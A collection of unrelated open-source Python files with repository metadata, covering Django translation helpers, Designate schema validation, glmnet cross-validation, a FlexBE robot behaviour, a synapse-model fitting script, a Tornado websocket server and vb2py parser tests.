return do_translate(message, 'gettext')
def ugettext(message):
return do_translate(message, 'ugettext')
def gettext_noop(message):
"""
Marks strings for translation but doesn't translate them now. This can be
used to store strings in global variables that should stay in the base
language (because they might be used externally) and will be translated
later.
"""
return message
def do_ntranslate(singular, plural, number, translation_function):
global _default, _active
t = _active.get(currentThread(), None)
if t is not None:
return getattr(t, translation_function)(singular, plural, number)
if _default is None:
from django.conf import settings
_default = translation(settings.LANGUAGE_CODE)
return getattr(_default, translation_function)(singular, plural, number)
def ngettext(singular, plural, number):
"""
Returns a UTF-8 bytestring of the translation of either the singular or
plural, based on the number.
"""
return do_ntranslate(singular, plural, number, 'ngettext')
def ungettext(singular, plural, number):
"""
Returns a unicode strings of the translation of either the singular or
plural, based on the number.
"""
return do_ntranslate(singular, plural, number, 'ungettext')
def check_for_language(lang_code):
"""
Checks whether there is a global language file for the given language
code. This is used to decide whether a user-provided language is
available. This is only used for language codes from either the cookies or
session.
"""
from django.conf import settings
globalpath = os.path.join(os.path.dirname(sys.modules[settings.__module__].__file__), 'locale')
if gettext_module.find('django', globalpath, [to_locale(lang_code)]) is not None:
return True
else:
return False
def get_language_from_request(request):
"""
Analyzes the request to find what language the user wants the system to
show. Only languages listed in settings.LANGUAGES are taken into account.
If the user requests a sublanguage where we have a main language, we send
out the main language.
"""
global _accepted
from django.conf import settings
globalpath = os.path.join(os.path.dirname(sys.modules[settings.__module__].__file__), 'locale')
supported = dict(settings.LANGUAGES)
if hasattr(request, 'session'):
lang_code = request.session.get('django_language', None)
if lang_code in supported and lang_code is not None and check_for_language(lang_code):
return lang_code
lang_code = request.COOKIES.get(settings.LANGUAGE_COOKIE_NAME)
if lang_code and lang_code in supported and check_for_language(lang_code):
return lang_code
accept = request.META.get('HTTP_ACCEPT_LANGUAGE', '')
for accept_lang, unused in parse_accept_lang_header(accept):
if accept_lang == '*':
break
# We have a very restricted form for our language files (no encoding
# specifier, since they all must be UTF-8 and only one possible
# language each time. So we avoid the overhead of gettext.find() and
# work out the MO file manually.
# 'normalized' is the root name of the locale in POSIX format (which is
# the format used for the directories holding the MO files).
normalized = locale.locale_alias.get(to_locale(accept_lang, True))
if not normalized:
continue
# Remove the default encoding from locale_alias.
normalized = normalized.split('.')[0]
if normalized in _accepted:
# We've seen this locale before and have an MO file for it, so no
# need to check again.
return _accepted[normalized]
for lang, dirname in ((accept_lang, normalized),
(accept_lang.split('-')[0], normalized.split('_')[0])):
if lang.lower() not in supported:
continue
langfile = os.path.join(globalpath, dirname, 'LC_MESSAGES',
'django.mo')
if os.path.exists(langfile):
_accepted[normalized] = lang
return lang
return settings.LANGUAGE_CODE
def get_date_formats():
"""
Checks whether translation files provide a translation for some technical
message ID to store date and time formats. If it doesn't contain one, the
formats provided in the settings will be used.
"""
from django.conf import settings
date_format = ugettext('DATE_FORMAT')
datetime_format = ugettext('DATETIME_FORMAT')
time_format = ugettext('TIME_FORMAT')
if date_format == 'DATE_FORMAT':
date_format = settings.DATE_FORMAT
if datetime_format == 'DATETIME_FORMAT':
datetime_format = settings.DATETIME_FORMAT
if time_format == 'TIME_FORMAT':
time_format = settings.TIME_FORMAT
return date_format, datetime_format, time_format
def get_partial_date_formats():
"""
Checks whether translation files provide a translation for some technical
message ID to store partial date formats. If it doesn't contain one, the
formats provided in the settings will be used.
"""
from django.conf import settings
year_month_format = ugettext('YEAR_MONTH_FORMAT')
month_day_format = ugettext('MONTH_DAY_FORMAT')
if year_month_format == 'YEAR_MONTH_FORMAT':
year_month_format = settings.YEAR_MONTH_FORMAT
if month_day_format == 'MONTH_DAY_FORMAT':
month_day_format = settings.MONTH_DAY_FORMAT
return year_month_format, month_day_format
dot_re = re.compile(r'\S')
def blankout(src, char):
"""
Changes every non-whitespace character to the given char.
Used in the templatize function.
"""
return dot_re.sub(char, src)
inline_re = re.compile(r"""^\s*trans\s+((?:".*?")|(?:'.*?'))\s*""")
block_re = re.compile(r"""^\s*blocktrans(?:\s+|$)""")
endblock_re = re.compile(r"""^\s*endblocktrans$""")
plural_re = re.compile(r"""^\s*plural$""")
constant_re = re.compile(r"""_\(((?:".*?")|(?:'.*?'))\)""")
def templatize(src):
"""
Turns a Django template into something that is understood by xgettext. It
does so by translating the Django translation tags into standard gettext
function invocations.
"""
from django.template import Lexer, TOKEN_TEXT, TOKEN_VAR, TOKEN_BLOCK
out = StringIO()
intrans = False
inplural = False
singular = []
plural = []
for t in Lexer(src, None).tokenize():
if intrans:
if t.token_type == TOKEN_BLOCK:
endbmatch = endblock_re.match(t.contents)
pluralmatch = plural_re.match(t.contents)
if endbmatch:
if inplural:
out.write(' ngettext(%r,%r,count) ' % (''.join(singular), ''.join(plural)))
for part in singular:
out.write(blankout(part, 'S'))
for part in plural:
out.write(blankout(part, 'P'))
else:
out.write(' gettext(%r) ' % ''.join(singular))
for part in singular:
out.write(blankout(part, 'S'))
intrans = False
inplural = False
singular = []
plural = []
elif pluralmatch:
inplural = True
else:
raise SyntaxError("Translation blocks must not include other block tags: %s" % t.contents)
elif t.token_type == TOKEN_VAR:
if inplural:
plural.append('%%(%s)s' % t.contents)
else:
singular.append('%%(%s)s' % t.contents)
elif t.token_type == TOKEN_TEXT:
if inplural:
plural.append(t.contents)
else:
singular.append(t.contents)
else:
if t.token_type == TOKEN_BLOCK:
imatch = inline_re.match(t.contents)
bmatch = block_re.match(t.contents)
cmatches = constant_re.findall(t.contents)
if imatch:
g = imatch.group(1)
if g[0] == '"': g = g.strip('"')
elif g[0] == "'": g = g.strip("'")
out.write(' gettext(%r) ' % g)
elif bmatch:
for fmatch in constant_re.findall(t.contents):
out.write(' _(%s) ' % fmatch)
intrans = True
inplural = False
singular = []
plural = []
elif cmatches:
for cmatch in cmatches:
out.write(' _(%s) ' % cmatch)
else:
out.write(blankout(t.contents, 'B'))
elif t.token_type == TOKEN_VAR:
parts = t.contents.split('|')
cmatch = constant_re.match(parts[0])
if cmatch:
out.write(' _(%s) ' % cmatch.group(1))
for p in parts[1:]:
if p.find(':_(') >= 0:
out.write(' %s ' % p.split(':',1)[1])
else:
out.write(blankout(p, 'F'))
else:
out.write(blankout(t.contents, 'X'))
return out.getvalue()
def parse_accept_lang_header(lang_string):
"""
Parses the lang_string, which is the body of an HTTP Accept-Language
header, and returns a list of (lang, q-value), ordered by 'q' values.
Any format errors in lang_string results in an empty list being returned.
"""
result = []
pieces = accept_language_re.split(lang_string)
if pieces[-1]:
return []
for i in range(0, len(pieces) - 1, 3):
first, lang, priority = pieces[i : i + 3]
if first:
return []
priority = priority and float(priority) or 1.0
result.append((lang, priority))
result.sort(lambda x, y: -cmp(x[1], y[1]))
return result
|
greggian/TapdIn
|
django/utils/translation/trans_real.py
|
Python
|
apache-2.0
| 20,192
| 0.00213
|
def get_file_extension(filename):
return filename.split(".")[-1]
|
finiteloopsoftware/django-compressor
|
compress/utils.py
|
Python
|
bsd-3-clause
| 69
| 0
|
# Copyright 2012 Managed I.T.
#
# Author: Kiall Mac Innes <kiall@managedit.ie>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from designate import exceptions
from designate.schema import format
from designate.schema import resolvers
from designate.schema import validators
from designate import utils
LOG = logging.getLogger(__name__)
class Schema(object):
def __init__(self, version, name):
self.raw_schema = utils.load_schema(version, name)
self.resolver = resolvers.LocalResolver.from_schema(
version, self.raw_schema)
if version in ['v2', 'admin']:
self.validator = validators.Draft4Validator(
self.raw_schema, resolver=self.resolver,
format_checker=format.draft4_format_checker)
else:
raise Exception('Unknown API version: %s' % version)
@property
def schema(self):
return self.validator.schema
@property
def properties(self):
return self.schema['properties']
@property
def links(self):
return self.schema['links']
@property
def raw(self):
return self.raw_schema
def validate(self, obj):
LOG.debug('Validating values: %r' % obj)
errors = []
for error in self.validator.iter_errors(obj):
errors.append({
'path': ".".join([str(x) for x in error.path]),
'message': error.message,
'validator': error.validator
})
if len(errors) > 0:
LOG.debug('Errors in validation: %r' % errors)
raise exceptions.InvalidObject("Provided object does not match "
"schema", errors=errors)
def filter(self, instance, properties=None):
if not properties:
properties = self.properties
filtered = {}
for name, subschema in list(properties.items()):
if 'type' in subschema and subschema['type'] == 'array':
subinstance = instance.get(name, None)
filtered[name] = self._filter_array(subinstance, subschema)
elif 'type' in subschema and subschema['type'] == 'object':
subinstance = instance.get(name, None)
properties = subschema['properties']
filtered[name] = self.filter(subinstance, properties)
else:
filtered[name] = instance.get(name, None)
return filtered
def _filter_array(self, instance, schema):
if 'items' in schema and isinstance(schema['items'], list):
# NOTE(kiall): We currently don't make use of this..
raise NotImplementedError()
elif 'items' in schema:
schema = schema['items']
if '$ref' in schema:
with self.resolver.resolving(schema['$ref']) as ischema:
schema = ischema
properties = schema['properties']
return [self.filter(i, properties) for i in instance]
elif 'properties' in schema:
schema = schema['properties']
with self.resolver.resolving(schema['$ref']) as ischema:
schema = ischema
return [self.filter(i, schema) for i in instance]
else:
raise NotImplementedError('Can\'t filter unknown array type')
|
openstack/designate
|
designate/schema/__init__.py
|
Python
|
apache-2.0
| 3,897
| 0
|
# -*- coding: utf-8 -*-
"""
--------------------------------------------------------------------------
cvglmnet.m: cross-validation for glmnet
--------------------------------------------------------------------------
DESCRIPTION:
Does k-fold cross-validation for glmnet, produces a plot, and returns
a value for lambdau. Cross-validation is not implemented for Cox model yet.
USAGE:
Note that like glmnet, all arguments are keyword-only:
CVerr = cvglmnet(x, y, family, options, type, nfolds, foldid,
parallel, keep, grouped);
Fewer input arguments(more often) are allowed in the call. Default values
for the arguments are used unless specified by the user.
=======================
INPUT ARGUMENTS
x nobs x nvar scipy 2D array of x parameters (as in glmnet).
y nobs x nc scipy Response y as in glmnet.
family Response type as family in glmnet.
options Options as in glmnet.
ptype loss to use for cross-validation. Currently five options, not
all available for all models. The default is ptype='deviance', which uses
squared-error for Gaussian models (a.k.a ptype='mse' there), deviance for
logistic and Poisson regression, and partial-likelihood for the Cox
model (Note that CV for cox model is not implemented yet).
ptype='class' applies to binomial and multinomial logistic
regression only, and gives misclassification error. ptype='auc' is for
two-class logistic regression only, and gives area under the ROC curve.
ptype='mse' or ptype='mae' (mean absolute error) can be used by all models
except the 'cox'; they measure the deviation from the fitted mean to the
response.
nfolds number of folds - default is 10. Although nfolds can be as
large as the sample size (leave-one-out CV), it is not recommended for
large datasets. Smallest value allowable is nfolds=3.
foldid an optional vector of values between 1 and nfold identifying
what fold each observation is in. If supplied, nfold can be
missing.
parallel If True, use parallel computation to fit each fold.
keep If keep=True, a prevalidated array is returned containing
fitted values for each observation and each value of lambda.
This means these fits are computed with this observation and
the rest of its fold omitted. The foldid vector is also
returned. Default is keep=False.
grouped This is an experimental argument, with default true, and can
be ignored by most users. For all models except the 'cox',
this refers to computing nfolds separate statistics, and then
using their mean and estimated standard error to describe the
CV curve. If grouped=false, an error matrix is built up at
the observation level from the predictions from the nfold
fits, and then summarized (does not apply to
type='auc'). For the 'cox' family, grouped=true obtains the
CV partial likelihood for the Kth fold by subtraction; by
subtracting the log partial likelihood evaluated on the full
dataset from that evaluated on the on the (K-1)/K dataset.
This makes more efficient use of risk sets. With
grouped=FALSE the log partial likelihood is computed only on
the Kth fold.
=======================
OUTPUT ARGUMENTS:
A dict() is returned with the following fields.
lambdau the values of lambda used in the fits.
cvm the mean cross-validated error - a vector of length
length(lambdau).
cvsd estimate of standard error of cvm.
cvup upper curve = cvm+cvsd.
cvlo lower curve = cvm-cvsd.
nzero number of non-zero coefficients at each lambda.
name a text string indicating type of measure (for plotting
purposes).
glmnet_fit a fitted glmnet object for the full data.
lambda_min value of lambda that gives minimum cvm.
lambda_1se largest value of lambda such that error is within 1 standard
error of the minimum.
class Type of regression - internal usage.
fit_preval if keep=true, this is the array of prevalidated fits. Some
entries can be NA, if that and subsequent values of lambda
are not reached for that fold.
foldid if keep=true, the fold assignments used.
DETAILS:
The function runs glmnet nfolds+1 times; the first to get the lambda
sequence, and then the remainder to compute the fit with each of the
folds omitted. The error is accumulated, and the average error and
standard deviation over the folds is computed. Note that cvglmnet
does NOT search for values for alpha. A specific value should be
supplied, else alpha=1 is assumed by default. If users would like to
cross-validate alpha as well, they should call cvglmnet with a
pre-computed vector foldid, and then use this same fold vector in
separate calls to cvglmnet with different values of alpha.
LICENSE: GPL-2
AUTHORS:
Algorithm was designed by Jerome Friedman, Trevor Hastie and Rob Tibshirani
Fortran code was written by Jerome Friedman
R wrapper (from which the MATLAB wrapper was adapted) was written by Trevor Hasite
The original MATLAB wrapper was written by Hui Jiang,
and is updated and maintained by Junyang Qian.
This Python wrapper (adapted from the Matlab and R wrappers) is written by Balakumar B.J.,
Department of Statistics, Stanford University, Stanford, California, USA.
REFERENCES:
Friedman, J., Hastie, T. and Tibshirani, R. (2008) Regularization Paths for Generalized Linear Models via Coordinate Descent,
http://www.jstatsoft.org/v33/i01/
Journal of Statistical Software, Vol. 33(1), 1-22 Feb 2010
Simon, N., Friedman, J., Hastie, T., Tibshirani, R. (2011) Regularization Paths for Cox's Proportional Hazards Model via Coordinate Descent,
http://www.jstatsoft.org/v39/i05/
Journal of Statistical Software, Vol. 39(5) 1-13
Tibshirani, Robert., Bien, J., Friedman, J.,Hastie, T.,Simon, N.,Taylor, J. and Tibshirani, Ryan. (2010) Strong Rules for Discarding Predictors in Lasso-type Problems,
http://www-stat.stanford.edu/~tibs/ftp/strong.pdf
Stanford Statistics Technical Report
SEE ALSO:
cvglmnetPlot, cvglmnetCoef, cvglmnetPredict, and glmnet.
EXAMPLES:
# Gaussian
x = scipy.random.rand(100, 10)
y = scipy.random.rand(100, 1)
cvfit = cvglmnet(x = x, y = y)
cvglmnetPlot(cvfit)
print( cvglmnetCoef(cvfit) )
print( cvglmnetPredict(cvfit, x[0:5, :], 'lambda_min') )
cvfit1 = cvglmnet(x = x, y = y, ptype = 'mae')
cvglmnetPlot(cvfit1)
# Binomial
x = scipy.random.rand(100, 10)
y = scipy.random.rand(100,1)
y = (y > 0.5)*1.0
fit = cvglmnet(x = x, y = y, family = 'binomial', ptype = 'class')
cvglmnetPlot(fit)
# poisson
x = scipy.random.rand(100,10)
y = scipy.random.poisson(size = [100, 1])*1.0
cvfit = cvglmnet(x = x, y = y, family = 'poisson')
cvglmnetPlot(cvfit)
# Multivariate Gaussian:
x = scipy.random.rand(100, 10)
y = scipy.random.rand(100,3)
cvfit = cvglmnet(x = x, y = y, family = 'mgaussian')
cvglmnetPlot(cvfit)
# Multinomial
x = scipy.random.rand(100,10)
y = scipy.random.rand(100,1)
y[y < 0.3] = 1.0
y[y < 0.6] = 2.0
y[y < 1.0] = 3.0
cvfit = cvglmnet(x = x, y = y, family = 'multinomial')
cvglmnetPlot(cvfit)
#cox
Not implemented for cvglmnet.py
% Cox
n=1000;p=30;
nzc=p/3;
x=randn(n,p);
beta=randn(nzc,1);
fx=x(:,1:nzc)*beta/3;
hx=exp(fx);
ty=exprnd(1./hx,n,1);
tcens=binornd(1,0.3,n,1);
y=cat(2,ty,1-tcens);
foldid=randsample(10,n,true);
fit1_cv=cvglmnet(x,y,'cox',[],[],[],foldid);
cvglmnetPlot(fit1_cv);
% Parallel
matlabpool;
x=randn(1e3,100);
y=randn(1e3,1);
tic;
cvglmnet(x,y);
toc;
tic;
cvglmnet(x,y,[],[],[],[],[],true);
toc;
"""
import sys
import joblib
import multiprocessing
from glmnetSet import glmnetSet
from glmnetPredict import glmnetPredict
import scipy
from glmnet import glmnet
from cvelnet import cvelnet
from cvlognet import cvlognet
from cvmultnet import cvmultnet
from cvmrelnet import cvmrelnet
from cvfishnet import cvfishnet
def cvglmnet(*, x,
y,
family = 'gaussian',
ptype = 'default',
nfolds = 10,
foldid = scipy.empty([0]),
parallel = False,
keep = False,
grouped = True,
**options):
options = glmnetSet(options)
if 0 < len(options['lambdau']) < 2:
raise ValueError('Need more than one value of lambda for cv.glmnet')
nobs = x.shape[0]
# we should not really need this. user must supply the right shape
# if y.shape[0] != nobs:
# y = scipy.transpose(y)
# convert 1d python array of size nobs to 2d python array of size nobs x 1
if len(y.shape) == 1:
y = scipy.reshape(y, [y.size, 1])
# we should not really need this. user must supply the right shape
# if (len(options['offset']) > 0) and (options['offset'].shape[0] != nobs):
# options['offset'] = scipy.transpose(options['offset'])
if len(options['weights']) == 0:
options['weights'] = scipy.ones([nobs, 1], dtype = scipy.float64)
# main call to glmnet
glmfit = glmnet(x = x, y = y, family = family, **options)
is_offset = glmfit['offset']
options['lambdau'] = glmfit['lambdau']
nz = glmnetPredict(glmfit, scipy.empty([0]), scipy.empty([0]), 'nonzero')
if glmfit['class'] == 'multnet':
nnz = scipy.zeros([len(options['lambdau']), len(nz)])
for i in range(len(nz)):
nnz[:, i] = scipy.transpose(scipy.sum(nz[i], axis = 0))
nz = scipy.ceil(scipy.median(nnz, axis = 1))
elif glmfit['class'] == 'mrelnet':
nz = scipy.transpose(scipy.sum(nz[0], axis = 0))
else:
nz = scipy.transpose(scipy.sum(nz, axis = 0))
if len(foldid) == 0:
ma = scipy.tile(scipy.arange(nfolds), [1, scipy.floor(nobs/nfolds)])
mb = scipy.arange(scipy.mod(nobs, nfolds))
mb = scipy.reshape(mb, [1, mb.size])
population = scipy.append(ma, mb, axis = 1)
mc = scipy.random.permutation(len(population))
mc = mc[0:nobs]
foldid = population[mc]
foldid = scipy.reshape(foldid, [foldid.size,])
else:
nfolds = scipy.amax(foldid) + 1
if nfolds < 3:
raise ValueError('nfolds must be bigger than 3; nfolds = 10 recommended')
cpredmat = list()
foldid = scipy.reshape(foldid, [foldid.size, ])
if parallel == True:
num_cores = multiprocessing.cpu_count()
sys.stderr.write("[status]\tParallel glmnet cv with " + str(num_cores) + " cores\n")
cpredmat = joblib.Parallel(n_jobs=num_cores)(joblib.delayed(doCV)(i, x, y, family, foldid, nfolds, is_offset, **options) for i in range(nfolds))
else:
for i in range(nfolds):
newFit = doCV(i, x, y, family, foldid, nfolds, is_offset, **options)
cpredmat.append(newFit)
if cpredmat[0]['class'] == 'elnet':
cvstuff = cvelnet( cpredmat, options['lambdau'], x, y \
, options['weights'], options['offset'] \
, foldid, ptype, grouped, keep)
elif cpredmat[0]['class'] == 'lognet':
cvstuff = cvlognet(cpredmat, options['lambdau'], x, y \
, options['weights'], options['offset'] \
, foldid, ptype, grouped, keep)
elif cpredmat[0]['class'] == 'multnet':
cvstuff = cvmultnet(cpredmat, options['lambdau'], x, y \
, options['weights'], options['offset'] \
, foldid, ptype, grouped, keep)
elif cpredmat[0]['class'] == 'mrelnet':
cvstuff = cvmrelnet(cpredmat, options['lambdau'], x, y \
, options['weights'], options['offset'] \
, foldid, ptype, grouped, keep)
elif cpredmat[0]['class'] == 'fishnet':
cvstuff = cvfishnet(cpredmat, options['lambdau'], x, y \
, options['weights'], options['offset'] \
, foldid, ptype, grouped, keep)
elif cpredmat[0]['class'] == 'coxnet':
raise NotImplementedError('Cross-validation for coxnet not implemented yet.')
#cvstuff = cvcoxnet(cpredmat, options['lambdau'], x, y \
# , options['weights'], options['offset'] \
# , foldid, ptype, grouped, keep)
cvm = cvstuff['cvm']
cvsd = cvstuff['cvsd']
cvname = cvstuff['name']
CVerr = dict()
CVerr['lambdau'] = options['lambdau']
CVerr['cvm'] = scipy.transpose(cvm)
CVerr['cvsd'] = scipy.transpose(cvsd)
CVerr['cvup'] = scipy.transpose(cvm + cvsd)
CVerr['cvlo'] = scipy.transpose(cvm - cvsd)
CVerr['nzero'] = nz
CVerr['name'] = cvname
CVerr['glmnet_fit'] = glmfit
if keep:
CVerr['fit_preval'] = cvstuff['fit_preval']
CVerr['foldid'] = foldid
if ptype == 'auc':
cvm = -cvm
CVerr['lambda_min'] = scipy.amax(options['lambdau'][cvm <= scipy.amin(cvm)]).reshape([1])
idmin = options['lambdau'] == CVerr['lambda_min']
semin = cvm[idmin] + cvsd[idmin]
CVerr['lambda_1se'] = scipy.amax(options['lambdau'][cvm <= semin]).reshape([1])
CVerr['class'] = 'cvglmnet'
return(CVerr)
# end of cvglmnet
#==========================
def doCV(i, x, y, family, foldid, nfolds, is_offset, **options):
which = foldid == i
opts = options.copy()
opts['weights'] = opts['weights'][~which, ]
opts['lambdau'] = options['lambdau']
if is_offset:
if opts['offset'].size > 0:
opts['offset'] = opts['offset'][~which, ]
xr = x[~which, ]
yr = y[~which, ]
newFit = glmnet(x = xr, y = yr, family = family, **opts)
return(newFit)
|
hanfang/glmnet_python
|
glmnet_python/cvglmnet.py
|
Python
|
gpl-2.0
| 14,450
| 0.010242
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###########################################################
# WARNING: Generated code! #
# ************************** #
# Manual changes may get lost if file is generated again. #
# Only code inside the [MANUAL] tags will be kept. #
###########################################################
from flexbe_core import Behavior, Autonomy, OperatableStateMachine, ConcurrencyContainer, PriorityContainer, Logger
from sara_flexbe_states.sara_set_head_angle import SaraSetHeadAngle
from sara_flexbe_states.run_trajectory import RunTrajectory
from sara_flexbe_states.set_gripper_state import SetGripperState
# Additional imports can be added inside the following tags
# [MANUAL_IMPORT]
# [/MANUAL_IMPORT]
'''
Created on Thu Jul 27 2017
@author: Redouane Laref Nicolas Nadeau
'''
class Init_SequenceSM(Behavior):
'''
Initialisation Sequence
'''
def __init__(self):
super(Init_SequenceSM, self).__init__()
self.name = 'Init_Sequence'
# parameters of this behavior
# references to used behaviors
# Additional initialization code can be added inside the following tags
# [MANUAL_INIT]
# [/MANUAL_INIT]
# Behavior comments:
def create(self):
# x:976 y:64, x:973 y:289
_state_machine = OperatableStateMachine(outcomes=['finished', 'failed'])
# Additional creation code can be added inside the following tags
# [MANUAL_CREATE]
# [/MANUAL_CREATE]
with _state_machine:
# x:42 y:72
OperatableStateMachine.add('INIT HEAD',
SaraSetHeadAngle(pitch=0.4, yaw=0),
transitions={'done': 'repos'},
autonomy={'done': Autonomy.Off})
# x:205 y:72
OperatableStateMachine.add('repos',
RunTrajectory(file="repos", duration=0),
transitions={'done': 'opengrip'},
autonomy={'done': Autonomy.Off})
# x:506 y:86
OperatableStateMachine.add('opengrip',
SetGripperState(width=0.1, effort=0),
transitions={'object': 'finished', 'no_object': 'finished'},
autonomy={'object': Autonomy.Off, 'no_object': Autonomy.Off},
remapping={'object_size': 'object_size'})
return _state_machine
# Private functions can be added inside the following tags
# [MANUAL_FUNC]
# [/MANUAL_FUNC]
|
WalkingMachine/sara_behaviors
|
sara_flexbe_behaviors/src/sara_flexbe_behaviors/init_sequence_sm.py
|
Python
|
bsd-3-clause
| 2,331
| 0.023595
|
import numpy as np
import matplotlib.pyplot as plt
from math import exp
size = 9
dt = 50.0 # ms
dt_2 = 550.0
# Vectors to fit
x_fit = np.zeros(size)
V_max_fit = np.zeros(size)
V0_fit = np.zeros(size)
# Paramters of the model
tau_rec = 1000.0 # ms
tau_mem = 32.0 # ms
tau_in = 1.8 # ms
A = 144.0
u = 0.26
# First we will fit x
x_fit[0] = 1
for i in range(size - 2):
x_fit[i+1] = x_fit[i] * (1 - u) * exp(-dt / tau_rec)
+ 1 - exp(-dt / tau_rec)
# Last value of x_fit
x_fit[-1] = x_fit[-2] * (1 - u) * exp(-dt_2 / tau_rec)
+ 1 - exp(-dt_2 / tau_rec)
# We calculate alpha fit
alpha_fit = u * A * x_fit
# Now we calculate V_0 and V_max
V0_fit[0] = 0
tau_diff = tau_in - tau_mem
for k in range(size - 1):
ex1 = exp(-dt / tau_in)
ex2 = exp(-dt / tau_mem)
print 'ex1 ex2', ex1, ex2
problem = ex1 - ex2
print 'problem', problem
this = alpha_fit[k] * tau_in / tau_diff
print 'this', this
that = V0_fit[k] * exp(-dt / tau_mem)
print 'that', that
V0_fit[k + 1] = that + this * problem
for k in range(size - 1):
aux2 = (alpha_fit[k] * tau_in - V0_fit[k] * tau_diff)
#print 'aux', aux2
aux = alpha_fit[i] * tau_mem / aux2
V_max_fit[k] = alpha_fit[k] * (aux ** (tau_mem / tau_diff))
# The final values
ex1 = np.exp(-dt_2 / tau_in)
ex2 = np.exp(-dt_2 / tau_mem)
print 'ex1 ex2', ex1, ex2
problem = ex1 - ex2
problem = ex1 - ex2
this = alpha_fit[-2] * tau_in / tau_diff
that = V0_fit[-2] * exp(-dt_2 / tau_mem)
V0_fit[-1] = that + this * problem
aux = alpha_fit[-1] * tau_mem / (alpha_fit[-1]
* tau_in - V0_fit[-1] * tau_diff)
V_max_fit[-1] = alpha_fit[-1] * (aux ** (tau_mem / tau_diff))
amp_fit = V_max_fit - V0_fit
# Finally we plot
plt.subplot(1, 2, 1)
plt.plot(x_fit, '*-', label='x_fit')
plt.legend()
plt.subplot(1, 2, 2)
plt.plot(V_max_fit, '*-', label='Vmax_fit')
plt.hold(True)
plt.plot(V0_fit, '*-', label='V0_fit')
plt.legend()
plt.show()
|
h-mayorquin/g_node_data_analysis_205
|
1_day/fit_data.py
|
Python
|
bsd-2-clause
| 1,957
| 0.001533
|
try:
from tornado.websocket import WebSocketHandler
import tornado.ioloop
tornadoAvailable = True
except ImportError:
class WebSocketHandler(object): pass
tornadoAvailable = False
from json import loads as fromJS, dumps as toJS
from threading import Thread
from Log import console
import Settings
from utils import *
PORT = Settings.PORT + 1
handlers = []
channels = {}
class WebSocket:
@staticmethod
def available():
return tornadoAvailable
@staticmethod
def start():
if WebSocket.available():
WSThread().start()
@staticmethod
def broadcast(data):
for handler in handlers:
handler.write_message(toJS(data))
@staticmethod
def sendChannel(channel, data):
if not 'channel' in data:
data['channel'] = channel
for handler in channels.get(channel, []):
handler.write_message(toJS(data))
class WSThread(Thread):
def __init__(self):
Thread.__init__(self)
self.name = 'websocket'
self.daemon = True
def run(self):
app = tornado.web.Application([('/', WSHandler)])
app.listen(PORT, '0.0.0.0')
tornado.ioloop.IOLoop.instance().start()
class WSHandler(WebSocketHandler):
def __init__(self, *args, **kw):
super(WSHandler, self).__init__(*args, **kw)
self.channels = set()
def check_origin(self, origin):
return True
def open(self):
handlers.append(self)
console('websocket', "Opened")
def on_message(self, message):
console('websocket', "Message received: %s" % message)
try:
data = fromJS(message)
except:
return
if 'subscribe' in data and isinstance(data['subscribe'], list):
addChannels = (set(data['subscribe']) - self.channels)
self.channels |= addChannels
for channel in addChannels:
if channel not in channels:
channels[channel] = set()
channels[channel].add(self)
if 'unsubscribe' in data and isinstance(data['unsubscribe'], list):
rmChannels = (self.channels & set(data['unsubscribe']))
self.channels -= rmChannels
for channel in rmChannels:
channels[channel].remove(self)
if len(channels[channel]) == 0:
del channels[channel]
def on_close(self):
for channel in self.channels:
channels[channel].remove(self)
if len(channels[channel]) == 0:
del channels[channel]
handlers.remove(self)
console('websocket', "Closed")
verbs = {
'status': "Status set",
'name': "Renamed",
'goal': "Goal set",
'assigned': "Reassigned",
'hours': "Hours updated",
}
from Event import EventHandler, addEventHandler
class ShareTaskChanges(EventHandler):
def newTask(self, handler, task):
WebSocket.sendChannel("backlog#%d" % task.sprint.id, {'type': 'new'}); #TODO
def taskUpdate(self, handler, task, field, value):
if field == 'assigned': # Convert set of Users to list of usernames
value = [user.username for user in value]
elif field == 'goal': # Convert Goal to goal ID
value = value.id if value else 0
description = ("%s by %s" % (verbs[field], task.creator)) if field in verbs else None
WebSocket.sendChannel("backlog#%d" % task.sprint.id, {'type': 'update', 'id': task.id, 'revision': task.revision, 'field': field, 'value': value, 'description': description, 'creator': task.creator.username})
addEventHandler(ShareTaskChanges())
|
mrozekma/Sprint
|
WebSocket.py
|
Python
|
mit
| 3,192
| 0.030075
|
#
# Turn off logging in extensions (too loud!)
import vb2py.extensions
vb2py.extensions.disableLogging()
from vb2py.vbparser import buildParseTree, VBParserError
#
# Set some config options which are appropriate for testing
import vb2py.config
Config = vb2py.config.VB2PYConfig()
Config.setLocalOveride("General", "ReportPartialConversion", "No")
tests = []
# << Parsing tests >> (1 of 61)
# Simple assignments
tests.append("""
a = 10
b = 20+30
c = "hello there"
oneVal = 10
twoVals = Array(10,20)
functioncall = myfunction.mymethod(10)
""")
# Set type assignments
tests.append("""
Set a = myobject
Set b = myobject.subobject
Set obj = function(10, 20, 30+40)
""")
# Set type assignments with "New" objects
tests.append("""
Set a = New myobject
Set b = New myobject.subobject
""")
# Assignments with tough parenthesis
tests.extend([
"d=(((4*5)/2+10)-10)",
])
# Assignments with tough string quotes
tests.extend([
'd="g""h""j"""',
])
# Assignments with tough strings in general
tests.extend([
r'a="\"', # The single slash is a killer
])
# << Parsing tests >> (2 of 61)
# Simple expressions
tests.extend([
'a = 10',
'a = 20+30',
'a = "hello there"',
'a = 10',
'a = Array(10,20)',
'a = myfunction.mymethod(10)',
'a = &HFF',
'a = &HFF&',
'a = #1/10/2000#',
'a = #1/10#',
'a = 10 Mod 2',
])
# Nested expressions
tests.extend(["a = 10+(10+(20+(30+40)))",
"a = (10+20)+(30+40)",
"a = ((10+20)+(30+40))",
])
# Conditional expressions
tests.extend(["a = a = 1",
"a = a <> 10",
"a = a > 10",
"a = a < 10",
"a = a <= 10",
"a = a >= 10",
"a = a = 1 And b = 2",
"a = a = 1 Or b = 2",
"a = a Or b",
"a = a Or Not b",
"a = Not a = 1",
"a = Not a",
"a = a Xor b",
"a = b Is Nothing",
"a = b \ 2",
"a = b Like c",
'a = "hello" Like "goodbye"',
])
# Things that failed
tests.extend([
"a = -(x*x)",
"a = -x*10",
"a = 10 Mod 6",
"Set NewEnum = mCol.[_NewEnum]",
"a = 10 ^ -bob",
])
# Functions
tests.extend([
"a = myfunction",
